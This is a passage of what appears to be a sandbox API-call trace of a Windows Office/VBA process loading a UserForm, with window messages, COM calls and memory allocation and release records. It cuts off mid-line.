MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93bacdc, cbMultiByte=-1, lpWideCharStr=0x2e5d90, cchWideChar=9 | out: lpWideCharStr="\x03VBFrame") returned 9 [0032.270] CExposedDocFile::OpenStream () returned 0x0 [0032.270] CExposedStream::Stat () returned 0x0 [0032.270] GlobalLock (hMem=0x5000088) returned 0x71576f0 [0032.270] GlobalSize (hMem=0x5000088) returned 0x200 [0032.270] CExposedStream::Read () returned 0x0 [0032.270] SetCursor (hCursor=0x10007) returned 0x10007 [0032.270] lstrcmpiA (lpString1="VERSION", lpString2="VERSION") returned 0 [0032.270] lstrcmpiA (lpString1="Begin", lpString2="Begin") returned 0 [0032.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3aab730, cbMultiByte=-1, lpWideCharStr=0x2e5d60, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0032.270] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x2e5de8 | out: pclsid=0x2e5de8*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0032.270] lstrcpynA (in: lpString1=0x2e5c90, lpString2="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", iMaxLength=256 | out: lpString1="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}" [0032.270] lstrcpynA (in: lpString1=0x2e5b90, lpString2="RDM", iMaxLength=256 | out: lpString1="RDM") returned="RDM" [0032.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5c90, cbMultiByte=-1, lpWideCharStr=0x2e5a60, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0032.270] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x2e5ac0 | out: pclsid=0x2e5ac0*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0032.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", cchWideChar=-1, lpMultiByteStr=0x2e5620, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpUsedDefaultChar=0x0) returned 0 [0032.271] lstrlenA (lpString="RDM") returned 3 [0032.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5c90, cbMultiByte=-1, lpWideCharStr=0x2e5a90, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0032.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5c90, cbMultiByte=-1, lpWideCharStr=0x2e5a20, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0032.271] lstrcmpiA (lpString1="Begin", lpString2="Caption") returned -1 [0032.271] lstrcmpiA (lpString1="End", lpString2="Caption") returned 1 [0032.271] lstrcpynA (in: lpString1=0x2e59b0, lpString2="Caption", iMaxLength=261 | out: lpString1="Caption") returned="Caption" [0032.271] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Caption") returned 0x107810 [0032.271] lstrcmpiA (lpString1="Begin", lpString2="ClientHeight") returned -1 [0032.271] lstrcmpiA (lpString1="End", lpString2="ClientHeight") returned 1 [0032.271] lstrcpynA (in: lpString1=0x2e59b0, lpString2="ClientHeight", iMaxLength=261 | out: lpString1="ClientHeight") returned="ClientHeight" [0032.271] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientHeight") returned 0x107da9 [0032.271] lstrcpynA (in: lpString1=0x91e8060, lpString2="8130", iMaxLength=261 | out: lpString1="8130") returned="8130" [0032.279] atof (_String="8130") returned 0x93b12f0 [0032.279] lstrcmpiA (lpString1="Begin", lpString2="ClientLeft") returned -1 [0032.279] lstrcmpiA (lpString1="End", lpString2="ClientLeft") returned 1 [0032.279] lstrcpynA (in: lpString1=0x2e59b0, lpString2="ClientLeft", iMaxLength=261 | out: lpString1="ClientLeft") returned="ClientLeft" [0032.279] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientLeft") returned 0x104925 [0032.279] lstrcpynA (in: lpString1=0x91e8060, lpString2="120", iMaxLength=261 | out: lpString1="120") returned="120" [0032.279] atof (_String="120") returned 0x93b12f0 [0032.279] lstrcmpiA (lpString1="Begin", lpString2="ClientTop") returned -1 [0032.279] lstrcmpiA (lpString1="End", lpString2="ClientTop") returned 1 [0032.279] lstrcpynA (in: lpString1=0x2e59b0, lpString2="ClientTop", iMaxLength=261 | out: lpString1="ClientTop") returned="ClientTop" [0032.279] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientTop") returned 0x109869 [0032.279] lstrcpynA (in: lpString1=0x91e8060, lpString2="450", iMaxLength=261 | out: lpString1="450") returned="450" [0032.279] atof (_String="450") returned 0x93b12f0 [0032.279] lstrcmpiA (lpString1="Begin", lpString2="ClientWidth") returned -1 [0032.279] lstrcmpiA (lpString1="End", lpString2="ClientWidth") returned 1 [0032.279] lstrcpynA (in: lpString1=0x2e59b0, lpString2="ClientWidth", iMaxLength=261 | out: lpString1="ClientWidth") returned="ClientWidth" [0032.279] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientWidth") returned 0x1028e4 [0032.279] lstrcpynA (in: lpString1=0x91e8060, lpString2="9915", iMaxLength=261 | out: lpString1="9915") returned="9915" [0032.279] atof (_String="9915") returned 0x93b12f0 [0032.279] lstrcmpiA (lpString1="Begin", lpString2="StartUpPosition") returned -1 [0032.279] lstrcmpiA (lpString1="End", lpString2="StartUpPosition") returned -1 [0032.279] lstrcpynA (in: lpString1=0x2e59b0, lpString2="StartUpPosition", iMaxLength=261 | out: lpString1="StartUpPosition") returned="StartUpPosition" [0032.279] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="StartUpPosition") returned 0x10fb67 [0032.279] lstrcpynA (in: lpString1=0x91e8060, lpString2="1", iMaxLength=261 | out: lpString1="1") returned="1" [0032.279] lstrcmpiA (lpString1="Begin", lpString2="TypeInfoVer") returned -1 [0032.279] lstrcmpiA (lpString1="End", lpString2="TypeInfoVer") returned -1 [0032.280] lstrcpynA (in: lpString1=0x2e59b0, lpString2="TypeInfoVer", iMaxLength=261 | out: lpString1="TypeInfoVer") returned="TypeInfoVer" [0032.280] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="TypeInfoVer") returned 0x107334 [0032.280] lstrcpynA (in: lpString1=0x91e8060, lpString2="35", iMaxLength=261 | out: lpString1="35") returned="35" [0032.280] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0032.280] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0032.281] DefMDIChildProcA (hWnd=0x10252, uMsg=0x24, wParam=0x0, lParam=0x2e4ff0) returned 0x0 [0032.281] DefMDIChildProcA (hWnd=0x10252, uMsg=0x81, wParam=0x0, lParam=0x2e4fc0) returned 0x1 [0032.281] DefMDIChildProcA (hWnd=0x10252, uMsg=0x83, wParam=0x0, lParam=0x2e5010) returned 0x0 [0032.281] DefMDIChildProcA (hWnd=0x10252, uMsg=0x1, wParam=0x0, lParam=0x2e4fc0) returned 0x0 [0032.281] DefMDIChildProcA (hWnd=0x10252, uMsg=0x5, wParam=0x0, lParam=0x2120482) returned 0x0 [0032.281] DefMDIChildProcA (hWnd=0x10252, uMsg=0x3, wParam=0x0, lParam=0x370021) returned 0x0 [0032.281] DefMDIChildProcA (hWnd=0x10252, uMsg=0x80, wParam=0x1, lParam=0x70233) returned 0x0 [0032.282] DefMDIChildProcA (hWnd=0x10252, uMsg=0xd, wParam=0x208, lParam=0x2e44b0) returned 0x0 [0032.282] DefMDIChildProcA (hWnd=0x10252, uMsg=0x7f, wParam=0x2, lParam=0x0) returned 0x1023b [0032.283] DefMDIChildProcA (hWnd=0x10252, uMsg=0xd, wParam=0x208, lParam=0x2e4500) returned 0x0 [0032.283] DefMDIChildProcA (hWnd=0x10252, uMsg=0x80, wParam=0x0, lParam=0x1023d) returned 0x0 [0032.283] IUnknown:AddRef (This=0x782d1f0) returned 0x11 [0032.283] ITypeLib:GetTypeInfoOfGuid (in: This=0x782d1f0, GUID=0x7fee3a7c9a8*(Data1=0x2e16b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppTInfo=0x91e3d58 | out: ppTInfo=0x91e3d58*=0xb41c168) returned 0x0 [0032.283] IUnknown:Release (This=0x782d1f0) returned 0x11 [0032.283] GetClassInfoA (in: hInstance=0x7fee36e0000, lpClassName="ThunderDFrame", lpWndClass=0x2e5640 | out: lpWndClass=0x2e5640) returned 0 [0032.283] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0032.284] MonitorFromWindow (hwnd=0x10222, dwFlags=0x2) returned 0x10001 [0032.284] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x2e5790 | out: lpmi=0x2e5790) returned 1 [0032.284] GetSystemMetrics (nIndex=2) returned 17 [0032.284] GetSystemMetrics (nIndex=21) returned 17 [0032.284] DefMDIChildProcA (hWnd=0x10252, uMsg=0x210, wParam=0x1, lParam=0x10254) returned 0x0 [0032.284] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0032.284] CoGetClassObject (in: rclsid=0x93bc998*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), dwClsContext=0x3, pvReserved=0x0, riid=0x7fee3a850c0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2e5d80 | out: ppv=0x2e5d80*=0x7fee33e1aa0) returned 0x0 [0032.350] CExposedDocFile::AddRef () returned 0x2 [0032.350] CExposedDocFile::AddRef () returned 0x3 [0032.414] CExposedDocFile::Release () returned 0x3 [0032.434] GetWindowLongA (hWnd=0x10254, nIndex=-20) returned 262401 [0032.434] SetWindowLongA (hWnd=0x10254, nIndex=-20, dwNewLong=262401) returned 262401 [0032.435] LoadAcceleratorsA (hInstance=0x7fee36e0000, lpTableName=0x3e8) returned 0x1024b [0032.533] PostMessageA (hWnd=0x10254, Msg=0x105f, wParam=0x0, lParam=0x0) returned 1 [0032.533] CExposedStream::Commit () returned 0x0 [0032.533] CExposedStream::Release () returned 0x0 [0032.533] GlobalHandle (pMem=0x71576f0) returned 0x5000088 [0032.533] GlobalUnlock (hMem=0x5000088) returned 0 [0032.533] SetFocus (hWnd=0x30204) returned 0x30204 [0032.535] GetCapture () returned 0x0 [0032.535] ShowWindow (hWnd=0x10254, nCmdShow=0) returned 0 [0032.535] GetParent (hWnd=0x10254) returned 0x10252 [0032.536] GetWindow (hWnd=0x10254, uCmd=0x5) returned 0x0 [0032.536] DestroyWindow (hWnd=0x10254) returned 1 [0032.536] DefMDIChildProcA (hWnd=0x10252, uMsg=0x210, wParam=0x2, lParam=0x10254) returned 0x0 [0032.536] GetPropA (hWnd=0x10254, lpString="VBAutomation") returned 0x0 [0032.537] GetFocus () returned 0x30204 [0032.537] SetWindowLongA (hWnd=0x10252, nIndex=0, dwNewLong=0) returned 154905272 [0032.537] SendMessageA (hWnd=0x10224, Msg=0x221, wParam=0x10252, lParam=0x0) returned 0x0 [0032.537] DefMDIChildProcA (hWnd=0x10252, uMsg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0032.537] NtdllDefWindowProc_A (hWnd=0x10252, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x1023d [0032.537] DestroyCursor (hCursor=0x1023d) returned 1 [0032.537] GetPropA (hWnd=0x10252, lpString="VBAutomation") returned 0x91e3d38 [0032.537] GetPropA (hWnd=0x10252, lpString="VBAutomation") returned 0x91e3d38 [0032.537] RemovePropA (hWnd=0x10252, lpString="VBAutomation") returned 0x91e3d38 [0032.537] DefMDIChildProcA (hWnd=0x10252, uMsg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0032.537] DefMDIChildProcA (hWnd=0x10252, uMsg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0032.537] IUnknown:QueryInterface (in: This=0xb5a50d8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6020 | out: ppvObject=0x2e6020*=0x0) returned 0x80004002 [0032.537] IUnknown:QueryInterface (in: This=0xb5a50d8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.537] IUnknown:QueryInterface (in: This=0xb5a50d8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe0 | out: ppvObject=0x2e5fe0*=0x0) returned 0x80004002 [0032.537] IUnknown:QueryInterface (in: This=0xb5a50d8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe8 | out: ppvObject=0x2e5fe8*=0x0) returned 0x80004002 [0032.537] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a50d8, ppTypeAttr=0x2e6018, pDummy=0x10 | out: ppTypeAttr=0x2e6018, pDummy=0x10) returned 0x0 [0032.537] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a50d8) returned 0x0 [0032.537] IUnknown:AddRef (This=0xb5a50d8) returned 0x3 [0032.538] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x71ac850 [0032.538] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x71acb50 [0032.538] IMalloc:Alloc (This=0x7fefe015380, cb=0xf8) returned 0xb45abf0 [0032.538] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0xb5ce0a0 [0032.538] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5ce010 [0032.538] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0xb5ce0d0 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0xb5cdf50 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0xb5ce130 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0xb5ce100 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0xb5ce1f0 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5cdfe0 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5cde00 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0xb5ce190 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0xb5ce160 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce220 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce250 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0xb5ce280 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0xb5ce2b0 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb492870 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb492850 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0xb5ce2e0 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0xb5ce310 [0032.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5ce340 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5ce370 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce3a0 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce3d0 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce400 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb494a30 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb494a50 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x75dfd30 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x75df130 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x75df170 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x75df8b0 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0xb5ce430 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0xb5ce460 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x75df030 [0032.540] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x75df070 [0032.540] LoadStringA (in: hInstance=0x7fef1850000, uID=0x3431, lpBuffer=0x2e3e50, cchBufferMax=512 | out: lpBuffer="Left\x7fTop\x7fWidth\x7fHeight\x7f\x7f") returned 0x17 [0032.541] LoadStringA (in: hInstance=0x7fef1850000, uID=0x3453, lpBuffer=0x2e3e50, cchBufferMax=512 | out: lpBuffer="Modal\x7f\x7f") returned 0x7 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0xb5ce4f0 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0xb5ce520 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x75dee30 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0xb5ce580 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5ce5b0 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5ce5e0 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0xb5ce610 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x71ad810 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x75def70 [0032.541] IMalloc:Alloc (This=0x7fefe015380, cb=0x34) returned 0x75df270 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0xb5cde90 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0xb5ce640 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0xb5ce670 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce6a0 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0xb5ce6d0 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0xb5ce700 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5ce730 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0xb5ce760 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0xb5ce790 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce7c0 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x75dee70 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0xb5ce7f0 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0xb5ce820 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb516390 [0032.542] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494a70 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494a90 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494ab0 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494ad0 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494af0 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494b10 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494b30 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494b50 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494b70 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494b90 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494bb0 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494bd0 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494bf0 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c30 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c50 [0032.543] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494d30 [0032.543] IMalloc:GetSize (This=0x7fefe015380, pv=0xb494d30) returned 0x10 [0032.549] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5a10 [0032.549] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5a10) returned 0x48 [0032.550] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5a10 [0032.550] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5a10) returned 0x48 [0032.551] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f6de0 [0032.551] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f6de0) returned 0x8 [0032.551] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4950b0 [0032.551] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4950b0) returned 0x10 [0032.551] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e5a10 [0032.551] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5a10) returned 0x40 [0032.552] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4950b0 [0032.552] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4950b0) returned 0x18 [0032.552] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4950b0 [0032.552] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4950b0) returned 0x10 [0032.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4950b0 [0032.553] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4950b0) returned 0x18 [0032.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f6de0 [0032.553] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f6de0) returned 0x8 [0032.553] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0xb5ce940 [0032.553] IMalloc:GetSize (This=0x7fefe015380, pv=0xb5ce940) returned 0x28 [0032.554] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0xb5ce940 [0032.554] IMalloc:GetSize (This=0x7fefe015380, pv=0xb5ce940) returned 0x28 [0032.554] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0xb5ce940 [0032.554] IMalloc:GetSize (This=0x7fefe015380, pv=0xb5ce940) returned 0x28 [0032.554] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4950b0 [0032.554] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4950b0) returned 0x10 [0032.555] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75decb0 [0032.555] IMalloc:GetSize (This=0x7fefe015380, pv=0x75decb0) returned 0x38 [0032.555] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4950b0 [0032.555] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4950b0) returned 0x10 [0032.559] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce0a0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce010) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce0d0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5cdf50) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce130) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce100) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce1c0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce1f0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5cdfe0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5cde00) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce190) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce160) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce220) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce250) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce280) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce2b0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb492870) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb492850) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce2e0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce310) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce340) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce370) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce3a0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce3d0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce400) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb494a30) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb494a50) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0x75dfd30) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0x75df130) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0x75df170) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0x75df8b0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce430) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce460) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0x75df030) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0x75df070) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce490) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce4c0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce4f0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce520) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0x75dee30) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce550) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce580) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce5b0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce5e0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce610) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5250) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb5a52b0) [0032.560] IMalloc:Free (This=0x7fefe015380, pv=0xb45abf0) [0032.560] IUnknown:QueryInterface (in: This=0xb5a5078, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6020 | out: ppvObject=0x2e6020*=0x0) returned 0x80004002 [0032.560] IUnknown:QueryInterface (in: This=0xb5a5078, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.560] IUnknown:QueryInterface (in: 